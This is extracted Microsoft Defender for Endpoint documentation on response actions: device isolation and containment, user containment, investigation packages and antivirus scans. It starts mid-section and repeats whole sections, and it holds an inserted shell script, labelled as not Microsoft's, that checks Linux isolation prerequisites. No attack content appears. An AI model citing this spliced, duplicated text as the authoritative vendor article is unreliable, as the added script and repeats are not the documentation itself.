If a contained device changes its IP address, then all Microsoft Defender for Endpoint
onboarded devices will recognize this and start blocking communications with the new
IP address. The original IP address will no longer be blocked (it may take up to 5
minutes to see these changes).
In cases where the contained device's IP is used by another device on the network,
there will be a warning while containing the device, with a link to advanced hunting
(with a pre-populated query). This will provide visibility to the other devices using the
same IP to help you make a conscious decision if you'd like to continue with containing
the device.
In cases where the contained device is a network device, a warning will appear with a
message that this may cause network connectivity issues (for example, containing a
router that is acting as a default gateway). At this point, you'll be able to choose
whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device

You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network

When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access, and helping prevent attacks, specifically
ransomware. When an identity is contained, any supported Microsoft Defender for
Endpoint onboarded device will block incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action
can significantly help to reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify and remediate the threat
to the compromised identity.

Note

Blocking incoming communication with a "contained" user is supported on onboarded
Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense version 8740 and
higher), Windows Server 2019+ devices, and Windows Server 2012 R2 and 2016 with the
modern agent.

How to contain a user

Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised, a "Contain User"
policy is automatically set.

View the contain user actions

After a user is contained, you can view the action in the History view of the Action
Center. Here, you can see when the action occurred and which users in your
organization were contained.

Furthermore, after an identity is considered "contained", that user will be blocked by
Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks will show up as alerts to help you quickly see the devices the compromised user
attempted to access and the potential attack techniques involved.

Undo contain user actions

You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action Center. In the side pane, select Undo.
2. Select the user from either the user inventory, the Incident page side pane, or the
alert side pane, and select Undo.

This action will restore this user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked
actions by the compromised user. In the Device timeline view, you can see information
about specific events, including protocol and interface granularity, and the relevant
MITRE technique associated with it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the individual blocking events related to Contain User in your tenant, dive deeper into
the context of each block, and extract the different entities and techniques associated
with those events.

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially
compromised device or already compromised ones. Microsoft Threat Experts can be
engaged directly from within Microsoft Defender XDR for timely and accurate
response. Experts provide insights not just about a potentially compromised device, but
also help you understand complex threats, the targeted attack notifications you receive,
the alerts, or the threat intelligence context shown on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file.
You'll be able to view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting
user, and if the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Feedback
Was this page helpful?  Yes  No

Provide product feedback


Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2


Microsoft Defender for Business

) Important

Some information in this article relates to prereleased product which may be


substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation


package. After taking action on devices, you can check activity details on the Action
center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

) Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan


Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file.

Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

) Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation


You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated


investigations.
Initiate live response session
Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic


data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices


As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the
device page.

2. Add comments and select Confirm.


3. Select Action center from the response actions section of the device page.

4. Click the Package collection package available to download the collection


package.

For Windows devices, the package contains the following folders:

Autoruns
    Contains a set of files that each represent the content of the registry of a known
    auto start entry point (ASEP) to help identify attacker's persistency on the device.
    NOTE: If the registry key is not found, the file will contain the following message:
    "ERROR: The system was unable to find the specified registry key or value."

Installed programs
    This .CSV file contains the list of installed programs that can help identify what is
    currently installed on the device. For more information, see Win32_Product class.

Network connections
    This folder contains a set of data points related to the connectivity information that
    can help in identifying connectivity to suspicious URLs, attacker's command and
    control (C&C) infrastructure, any lateral movement, or remote connections.
    ActiveNetConnections.txt: Displays protocol statistics and current TCP/IP network
    connections. Provides the ability to look for suspicious connectivity made by a
    process.
    Arp.txt: Displays the current address resolution protocol (ARP) cache tables for all
    interfaces. The ARP cache can reveal other hosts on a network that have been
    compromised or suspicious systems on the network that might have been used to
    run an internal attack.
    DnsCache.txt: Displays the contents of the DNS client resolver cache, which includes
    both entries preloaded from the local Hosts file and any recently obtained resource
    records for name queries resolved by the computer. This can help in identifying
    suspicious connections.
    IpConfig.txt: Displays the full TCP/IP configuration for all adapters. Adapters can
    represent physical interfaces, such as installed network adapters, or logical
    interfaces, such as dial-up connections.
    FirewallExecutionLog.txt and pfirewall.log
    NOTE: The pfirewall.log file must exist in
    %windir%\system32\logfiles\firewall\pfirewall.log, so it will be included in the
    investigation package. For more information on creating the firewall log file, see
    Configure the Windows Defender Firewall with Advanced Security Log.

Prefetch files
    Windows Prefetch files are designed to speed up the application startup process.
    They can be used to track all the files recently used in the system and find traces for
    applications that might have been deleted but can still be found in the prefetch file
    list.
    Prefetch folder: Contains a copy of the prefetch files from %SystemRoot%\Prefetch.
    NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.
    PrefetchFilesList.txt: Contains the list of all the copied files that can be used to track
    if there were any copy failures to the prefetch folder.

Processes
    Contains a .CSV file listing the running processes and provides the ability to identify
    current processes running on the device. This can be useful when identifying a
    suspicious process and its state.

Scheduled tasks
    Contains a .CSV file listing the scheduled tasks, which can be used to identify routines
    performed automatically on a chosen device to look for suspicious code that was set
    to run automatically.

Security event log
    Contains the security event log, which contains records of login or logout activity, or
    other security-related events specified by the system's audit policy.
    NOTE: Open the event log file using Event Viewer.

Services
    Contains a .CSV file that lists services and their states.

Windows Server Message Block (SMB) sessions
    Lists shared access to files, printers, and serial ports and miscellaneous
    communications between nodes on a network. This can help identify data exfiltration
    or lateral movement.
    Contains files for SMBInboundSessions and SMBOutboundSession.
    NOTE: If there are no sessions (inbound or outbound), you'll get a text file that tells
    you that there are no SMB sessions found.

System Information
    Contains a SystemInformation.txt file that lists system information such as OS version
    and network cards.

Temp Directories
    Contains a set of text files that list the files located in %Temp% for every user in the
    system. This can help to track suspicious files that an attacker may have dropped on
    the system.
    NOTE: If the file contains the following message: "The system cannot find the path
    specified", it means that there is no temp directory for this user, which might be
    because the user didn't log in to the system.

Users and Groups
    Provides a list of files that each represent a group and its members.

WdSupportLogs
    Provides the MpCmdRunLog.txt and MPSupportFiles.cab.
    NOTE: This folder will only be created on Windows 10, version 1709 or later with the
    February 2020 update rollup or more recent installed:
    Win10 1709 (RS3) Build 16299.1717: KB4537816
    Win10 1803 (RS4) Build 17134.1345: KB4537795
    Win10 1809 (RS5) Build 17763.1075: KB4537818
    Win10 1903/1909 (19h1/19h2) Builds 18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls
    This file is a summary of the investigation package collection. It contains the list of
    data points, the command used to extract the data, the execution status, and the
    error code if there is a failure. You can use this report to track if the package includes
    all the expected data and identify if there were any errors.
The collection packages for macOS and Linux devices contain the following:

Applications
    macOS: A list of all installed applications
    Linux: Not applicable

Disk volume
    macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
    Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
    macOS: A list of all open files with the corresponding processes using these files
    Linux: A list of all open files with the corresponding processes using these files

History
    macOS: Shell history
    Linux: Not applicable

Kernel modules
    macOS: All loaded modules
    Linux: Not applicable

Network connections
    macOS: Active connections; active listening connections; ARP table; firewall rules;
    interface configuration; proxy settings; VPN settings
    Linux: Active connections; active listening connections; ARP table; firewall rules;
    IP list; proxy settings

Processes
    macOS: A list of all running processes
    Linux: A list of all running processes

Services and scheduled tasks
    macOS: Certificates; configuration profiles; hardware information
    Linux: CPU details; hardware information; operating system information

System security information
    macOS: Extensible Firmware Interface (EFI) integrity information; firewall status;
    Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
    Linux: Not applicable

Users and groups
    macOS: Login history; sudoers
    Linux: Login history; sudoers
Run Microsoft Defender Antivirus scan on devices

As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

) Important

This action is supported for macOS and Linux for client version 101.98.84 and
above. You can also use live response to run the action. For more information
on live response, see Investigate entities on devices using live response.
A Microsoft Defender Antivirus scan can run alongside other antivirus
solutions, whether Microsoft Defender Antivirus is the active antivirus solution
or not. Microsoft Defender Antivirus can be in Passive mode. For more
information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

7 Note

When triggering a scan using Defender for Endpoint response action, Microsoft
Defender antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU
impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is
a limit of 50% maximum CPU load during a scan. For more information, see
configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution

In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

) Important

This action is available for devices on Windows 10, version 1709 or later,
Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code
integrity policy formats and signing requirements. For more information, see
Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

7 Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center will show the scan information and the device
timeline will include a new event.

Notification on device user

When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running:

7 Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network

Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

) Important

Isolating devices from the network is supported for macOS for client version
101.98.84 and above. You can also use live response to run the action. For
more information on live response, see Investigate entities on devices using
live response.
Full isolation is available for devices running Windows 11, Windows 10,
version 1703 or later, Windows Server 2022, Windows Server 2019, Windows
Server 2016 and Windows Server 2012 R2.
You can use the device isolation capability on all supported Microsoft
Defender for Endpoint on Linux versions listed in System requirements. Ensure that
the following prerequisites are enabled: iptables, ip6tables, and a Linux kernel
built with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and
CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709
or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed.
Therefore, devices that are behind a full VPN tunnel won't be able to reach
the Microsoft Defender for Endpoint cloud service after the device is isolated.
We recommend using a split-tunneling VPN for Microsoft Defender for
Endpoint and Microsoft Defender Antivirus cloud-based protection-related
traffic.
The feature supports VPN connections.
You must have at least one of the following role permissions: 'Active remediation
actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For
more information, see Create and manage device groups.
Exclusions are not supported for macOS and Linux isolation.
An isolated device is removed from isolation when an administrator modifies
or adds a new iptables rule on the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all
child virtual machines of the server.
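To confirm that a Linux device meets the isolation prerequisites listed in the note above before you rely on the action, here is an added shell script (not part of the Microsoft documentation or the Defender for Endpoint agent). It assumes the kernel configuration is readable at /proc/config.gz or /boot/config-<release>, and it also accepts CONFIG_NETFILTER_XT_MATCH_OWNER, the name the owner match carries on current kernels.

```shell
#!/bin/sh
# Added example, not part of the Microsoft documentation. Checks a Linux host for
# the isolation prerequisites the note lists: the iptables and ip6tables tools and a
# kernel built with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES and the owner match.
# Assumption: the owner match may be spelled CONFIG_IP_NF_MATCH_OWNER (legacy,
# as in the documentation) or CONFIG_NETFILTER_XT_MATCH_OWNER (xt_owner).

# Locate the running kernel's build configuration: /proc/config.gz when the kernel
# was built with CONFIG_IKCONFIG_PROC, otherwise the distribution's /boot/config-<release>.
find_kernel_config() {
  if [ -r /proc/config.gz ]; then
    printf '%s\n' /proc/config.gz
  elif [ -r "/boot/config-$(uname -r)" ]; then
    printf '%s\n' "/boot/config-$(uname -r)"
  else
    return 1
  fi
}

# Print the configuration as plain text, decompressing a .gz file if needed.
read_kernel_config() {
  case "$1" in
    *.gz) gzip -dc "$1" ;;
    *)    cat "$1" ;;
  esac
}

# config_has <file> <option>: true when the option is built in (=y) or a module (=m).
config_has() {
  read_kernel_config "$1" | grep -Eq "^$2=(y|m)\$"
}

# check_kernel_options <file>: report each required option; returns 0 only when
# every one of them is present.
check_kernel_options() {
  missing=0
  for opt in CONFIG_NETFILTER CONFIG_IP_NF_IPTABLES; do
    if config_has "$1" "$opt"; then
      echo "ok       $opt"
    else
      echo "MISSING  $opt"
      missing=1
    fi
  done
  # Owner match: legacy name from the documentation, or the current xt_owner name.
  if config_has "$1" CONFIG_IP_NF_MATCH_OWNER || \
     config_has "$1" CONFIG_NETFILTER_XT_MATCH_OWNER; then
    echo "ok       owner match (CONFIG_IP_NF_MATCH_OWNER or CONFIG_NETFILTER_XT_MATCH_OWNER)"
  else
    echo "MISSING  owner match (CONFIG_IP_NF_MATCH_OWNER or CONFIG_NETFILTER_XT_MATCH_OWNER)"
    missing=1
  fi
  return $missing
}

# check_tools: confirm iptables and ip6tables are available on PATH.
check_tools() {
  missing=0
  for tool in iptables ip6tables; do
    if command -v "$tool" >/dev/null 2>&1; then
      echo "ok       $tool ($(command -v "$tool"))"
    else
      echo "MISSING  $tool"
      missing=1
    fi
  done
  return $missing
}

# Run both checks against the live host. Exit status 0: prerequisites met;
# 1: something is missing; 2: the kernel configuration could not be found.
check_isolation_prereqs() {
  cfg=$(find_kernel_config) || { echo "kernel configuration not found" >&2; return 2; }
  echo "kernel configuration: $cfg"
  status=0
  check_kernel_options "$cfg" || status=1
  check_tools || status=1
  if [ "$status" -eq 0 ]; then
    echo "RESULT: isolation prerequisites met"
  else
    echo "RESULT: prerequisites missing; isolation may not take effect on this device"
  fi
  return $status
}

# Run the host check only when invoked with --run, so the functions can also be sourced.
if [ "${1:-}" = "--run" ]; then
  check_isolation_prereqs
fi
```

Run it as `sh check-isolation-prereqs.sh --run` on the device; a non-zero exit status means the Linux isolation action should not be expected to take effect until the missing item is fixed.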

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (a.k.a. 'Selective Isolation').

7 Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the scan information and the device timeline will
include a new event.

7 Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation

The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive. There's a downloadable script for these instances that you can run to
forcibly release devices from isolation. The script is available through a link in the UI.

7 Note

Admins and users with the 'Manage security settings in Security Center' permission
can forcibly release devices from isolation.
The script is valid for the specific device only.
The script expires in three days.

To forcibly release a device from isolation:

1. On the device page, select Download script to force-release a device from
isolation from the action menu.
2. On the right-hand side wizard, select Download script.

Minimum requirements

The minimum requirements for the 'forcibly release device from isolation' feature are:

Supports only Windows
The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user

When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:

7 Note

The notification is not available on non-Windows platforms.

Contain devices from the network

When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device, any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

7 Note

Blocking incoming and outgoing communication with a 'contained' device is
supported on onboarded Microsoft Defender for Endpoint Windows 10 and
Windows Server 2019+ devices.

How to contain a device

1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.

Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from
the action bar:

7 Note
It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

) Important

If a contained device changes its IP address, then all Microsoft Defender for
Endpoint onboarded devices will recognize this and start blocking
communications with the new IP address. The original IP address will no
longer be blocked (It may take up to 5 mins to see these changes).
In cases where the contained device's IP is used by another device on the
network, there will be a warning while containing the device, with a link to
advanced hunting (with a pre-populated query). This will provide visibility to
the other devices using the same IP to help you make a conscious decision if
you'd like to continue with containing the device.
In cases where the contained device is a network device, a warning will appear
with a message that this may cause network connectivity issues (for example,
containing a router that is acting as a default gateway). At this point, you'll be
able to choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device

You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network

When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access and helping prevent attacks, specifically
ransomware. When an identity is contained, any supported Microsoft Defender for
Endpoint onboarded device will block incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action
can significantly help to reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify and remediate the threat
to the compromised identity.

7 Note

Blocking incoming communication with a "contained" user is supported on
onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense
version 8740 and higher), Windows Server 2019+ devices, and Windows Server
2012 R2 and 2016 with the modern agent.

How to contain a user

Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised, a "Contain User"
policy is automatically set.

View the contain user actions

After a user is contained, you can view the action in the History view of the Action
center. Here, you can see when the action occurred, and which users in your
organization were contained.

Furthermore, after an identity is considered "contained", that user will be blocked by
Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks will show up as alerts to help you quickly see the devices the compromised user
attempted to access and the potential attack techniques.

Undo contain user actions

You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action center. In the side pane, select Undo.
2. Select the user from either the user inventory, incident page side pane or alert side
pane and select Undo.

This action will restore this user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked
actions by the compromised user. In the Device timeline view, you can see information
about specific events, including protocol and interface granularity, and the relevant
MITRE technique associated with it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the different singular blocking events in relation to Contain User in your tenant, dive
deeper into the context of each block, and extract the different entities and techniques
associated with those events.

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially
compromised device or already compromised ones. Microsoft Threat Experts can be
engaged directly from within Microsoft Defender XDR for timely and accurate
response. Experts provide insights not just regarding a potentially compromised device,
but also to better understand complex threats, targeted attack notifications that you
get, or if you need more information about the alerts, or a threat intelligence context
that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file.
You'll be able to view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting
user, and if the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1


Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2


Microsoft Defender for Business

) Important

Some information in this article relates to prereleased product which may be


substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation


package. After taking action on devices, you can check activity details on the Action
center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

) Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan


Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file.

Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

) Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation


You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated


investigations.
Initiate live response session
Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic


data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices


As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the
device page.

2. Add comments and select Confirm.


3. Select Action center from the response actions section of the device page.

4. Click the Package collection package available to download the collection


package.

For Windows devices, the package contains the following folders:

ノ Expand table
Folder Description

Autoruns Contains a set of files that each represent the content of


the registry of a known auto start entry point (ASEP) to
help identify attacker's persistency on the device.

NOTE: If the registry key is not found, the file


will contain the following message: "ERROR:
The system was unable to find the specified
registry key or value."

Installed programs This .CSV file contains the list of installed programs that
can help identify what is currently installed on the device.
For more information, see Win32_Product class .

Network connections This folder contains a set of data points related to the
connectivity information that can help in identifying
connectivity to suspicious URLs, attacker's command and
control (C&C) infrastructure, any lateral movement, or
remote connections.
ActiveNetConnections.txt: Displays protocol
statistics and current TCP/IP network connections.
Provides the ability to look for suspicious
connectivity made by a process.
Arp.txt: Displays the current address resolution
protocol (ARP) cache tables for all interfaces. ARP
cache can reveal other hosts on a network that have
been compromised or suspicious systems on the
network that might have been used to run an
internal attack.
DnsCache.txt: Displays the contents of the DNS
client resolver cache, which includes both entries
preloaded from the local Hosts file and any recently
obtained resource records for name queries
resolved by the computer. This can help in
identifying suspicious connections.
IpConfig.txt: Displays the full TCP/IP configuration
for all adapters. Adapters can represent physical
interfaces, such as installed network adapters, or
logical interfaces, such as dial-up connections.
FirewallExecutionLog.txt and pfirewall.log

NOTE: The pfirewall.log file must exist in


%windir%\system32\logfiles\firewall\pfirewall.
log, so it will be included in the investigation
package. For more information on creating
Folder Description

the firewall log file, see Configure the


Windows Defender Firewall with Advanced
Security Log

Prefetch files Windows Prefetch files are designed to speed up the


application startup process. It can be used to track all the
files recently used in the system and find traces for
applications that might have been deleted but can still be
found in the prefetch file list.
Prefetch folder: Contains a copy of the prefetch files
from %SystemRoot%\Prefetch . NOTE: It is suggested
to download a prefetch file viewer to view the
prefetch files.
PrefetchFilesList.txt: Contains the list of all the
copied files that can be used to track if there were
any copy failures to the prefetch folder.

Processes Contains a .CSV file listing the running processes and


provides the ability to identify current processes running
on the device. This can be useful when identifying a
suspicious process and its state.

Scheduled tasks Contains a .CSV file listing the scheduled tasks, which can
be used to identify routines performed automatically on a
chosen device to look for suspicious code that was set to
run automatically.

Security event log Contains the security event log, which contains records of
login or logout activity, or other security-related events
specified by the system's audit policy.

NOTE: Open the event log file using Event


viewer.

Services Contains a .CSV file that lists services and their states.

Windows Server Message Lists shared access to files, printers, and serial ports and
Block (SMB) sessions miscellaneous communications between nodes on a
network. This can help identify data exfiltration or lateral
movement.
Contains files for SMBInboundSessions and
SMBOutboundSession.
Folder Description

NOTE: If there are no sessions (inbound or


outbound), you'll get a text file that tells you
that there are no SMB sessions found.

System Information Contains a SystemInformation.txt file that lists system


information such as OS version and network cards.

Temp Directories Contains a set of text files that lists the files located in
%Temp% for every user in the system.
This can help to track suspicious files that an attacker may
have dropped on the system.

NOTE: If the file contains the following


message: "The system cannot find the path
specified", it means that there is no temp
directory for this user, and might be because
the user didn't log in to the system.

Users and Groups Provides a list of files that each represent a group and its
members.

WdSupportLogs Provides the MpCmdRunLog.txt and MPSupportFiles.cab

NOTE: This folder will only be created on


Windows 10, version 1709 or later with
February 2020 update rollup or more recent
installed:

Win10 1709 (RS3) Build 16299.1717:


KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls This file is a summary of the investigation package


collection, it contains the list of data points, the command
used to extract the data, the execution status, and the
Folder Description

error code if there is failure. You can use this report to


track if the package includes all the expected data and
identify if there were any errors.

The collection packages for macOS and Linux devices contain the following:

Applications
  macOS: A list of all installed applications
  Linux: Not applicable

Disk volume
  macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
  Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
  macOS: A list of all open files with the corresponding processes using these files
  Linux: A list of all open files with the corresponding processes using these files

History
  macOS: Shell history
  Linux: Not applicable

Kernel modules
  macOS: All loaded modules
  Linux: Not applicable

Network connections
  macOS: Active connections; active listening connections; ARP table; firewall rules; interface configuration; proxy settings; VPN settings
  Linux: Active connections; active listening connections; ARP table; firewall rules; IP list; proxy settings

Processes
  macOS: A list of all running processes
  Linux: A list of all running processes

Services and scheduled tasks
  macOS: Certificates; configuration profiles; hardware information
  Linux: CPU details; hardware information; operating system information

System security information
  macOS: Extensible Firmware Interface (EFI) integrity information; firewall status; Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
  Linux: Not applicable

Users and groups
  macOS: Login history; sudoers
  Linux: Login history; sudoers

Run Microsoft Defender Antivirus scan on devices
As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

) Important

- This action is supported for macOS and Linux for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
- A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Microsoft Defender Antivirus is the active antivirus solution or not. Microsoft Defender Antivirus can be in Passive mode. For more information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run (quick or full) and add a comment before confirming the scan.

